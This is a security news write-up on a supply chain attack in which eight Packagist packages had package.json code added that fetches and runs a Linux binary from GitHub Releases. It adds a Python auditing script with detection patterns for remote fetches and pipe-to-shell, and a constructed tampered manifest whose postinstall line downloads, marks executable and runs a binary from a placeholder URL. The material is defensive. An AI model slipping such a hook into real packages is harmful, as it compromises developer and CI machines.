Packagist Supply Chain Attack Infects 8 Packages with Linux Malware
A new, coordinated supply chain attack has compromised eight packages on Packagist. The attack injects malicious code that retrieves and executes a Linux binary hosted on GitHub Releases. This isn't a typical composer.json compromise: The Hacker News reports that the malicious code was inserted into package.json files, specifically targeting projects that incorporate JavaScript components.
This vector matters because attackers are moving beyond the traditional package-manager manifest to broader supply chain points. By targeting package.json, they reach projects that bundle JavaScript, a different set of development workflows and environments, even when the primary package manager is Composer. This shows a clear intent to maximize impact by leveraging the widespread use of JavaScript in modern applications.
What This Means For You
- If your development pipeline uses Composer and incorporates JavaScript packages, you need to audit your `package.json` files immediately. Check for any unauthorized modifications or suspicious entries that could fetch external binaries. This isn't just about Composer anymore; it's about the entire dependency tree. Assume compromise and validate every external dependency.
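One way to carry out that audit, as an added example that is not code from the article or from any affected project: a Python script that walks every `package.json` under a project (including `vendor/` and `node_modules/`) and flags npm lifecycle hooks whose commands fetch an external URL, reference a GitHub Releases download, mark a file executable, pipe into a shell, or decode base64. The package names, paths and URLs below are constructed placeholders, and the heuristics are assumptions modelled on the behaviour the article describes, not the actual indicators from the incident.

```python
"""Audit package.json files for lifecycle scripts that fetch or run external binaries.

Added example; not code from the original article or from any affected project.
Package names, paths and URLs below are constructed placeholders.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically during `npm install`; code placed in one
# of them executes on every developer and CI machine that installs the package.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "prepublish", "prepublishOnly", "prepack", "postpack")

# Heuristics (assumptions) for the behaviour described in the article: fetch a
# binary from an external URL (GitHub Releases in the reported case), make it
# executable, run it. Order matters only for the order of reported reasons.
SUSPICIOUS_PATTERNS = [
    ("remote_fetch", re.compile(r"\b(curl|wget)\b", re.I)),
    ("github_release_url", re.compile(r"https?://github\.com/[^/\s]+/[^/\s]+/releases/download/", re.I)),
    ("external_url", re.compile(r"https?://[^\s'\"]+", re.I)),
    ("chmod_exec", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(sh|bash|zsh)\b")),
    ("inline_eval", re.compile(r"\b(node|python[0-9.]*)\s+-[ec]\b")),
    ("base64_decode", re.compile(r"base64\s+(-d|--decode)|Buffer\.from\([^)]*base64", re.I)),
]


def audit_scripts(manifest, source="<inline>"):
    """Return one finding per lifecycle hook whose command matches a heuristic."""
    findings = []
    scripts = manifest.get("scripts") or {}
    if not isinstance(scripts, dict):
        return findings
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        reasons = [name for name, pattern in SUSPICIOUS_PATTERNS if pattern.search(command)]
        if reasons:
            findings.append({"source": source, "hook": hook, "command": command, "reasons": reasons})
    return findings


def audit_tree(root):
    """Scan every package.json under root, including vendor/ (Composer packages
    that bundle JavaScript) and node_modules/."""
    findings = []
    for path in sorted(Path(root).rglob("package.json")):
        try:
            manifest = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError) as exc:
            # An unparseable manifest is itself worth a look; report it instead of skipping silently.
            findings.append({"source": str(path), "hook": None, "command": None,
                             "reasons": [f"unparseable: {exc}"]})
            continue
        if isinstance(manifest, dict):
            findings.extend(audit_scripts(manifest, str(path)))
    return findings


# Constructed sample manifests (placeholder names and URL, not real packages).
BENIGN_MANIFEST = {
    "name": "example-vendor/widget-assets",
    "scripts": {"build": "webpack --mode production",
                "postinstall": "node scripts/copy-fonts.js"},
}
TAMPERED_MANIFEST = {
    "name": "example-vendor/widget-assets",
    "scripts": {"build": "webpack --mode production",
                "postinstall": ("curl -sL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1.0.0/agent"
                                " -o /tmp/.agent && chmod +x /tmp/.agent && /tmp/.agent &")},
}


def audit_sample_tree():
    """Write the constructed manifests into a temporary vendor/ tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        clean = root / "vendor" / "example-vendor" / "clean-pkg" / "package.json"
        bad = root / "vendor" / "example-vendor" / "tampered-pkg" / "package.json"
        for path, manifest in ((clean, BENIGN_MANIFEST), (bad, TAMPERED_MANIFEST)):
            path.parent.mkdir(parents=True)
            path.write_text(json.dumps(manifest), encoding="utf-8")
        return [{**f, "source": Path(f["source"]).relative_to(root).as_posix()}
                for f in audit_tree(root)]


if __name__ == "__main__":
    for finding in audit_sample_tree():
        print(f"{finding['source']}: {finding['hook']} -> {finding['reasons']}")
        print("   ", finding["command"])
```

Run it against a checkout with `audit_tree(".")` and review every hit by hand; a legitimate postinstall can match too, so the script narrows the review, it does not replace it. As a standing mitigation for CI and developer machines, npm's `ignore-scripts=true` setting in `.npmrc` stops lifecycle hooks from running at all during install, so a tampered hook never gets to fetch anything.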
Detection Rules
- Traffic to Compromised Vendor: Packagist
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| Packagist-Supply-Chain-Attack-2026-05 | Supply Chain Attack | Packagist packages |
| Packagist-Supply-Chain-Attack-2026-05 | Code Injection | Malicious code inserted into package.json |
| Packagist-Supply-Chain-Attack-2026-05 | Malware | Linux binary retrieved from GitHub Releases URL |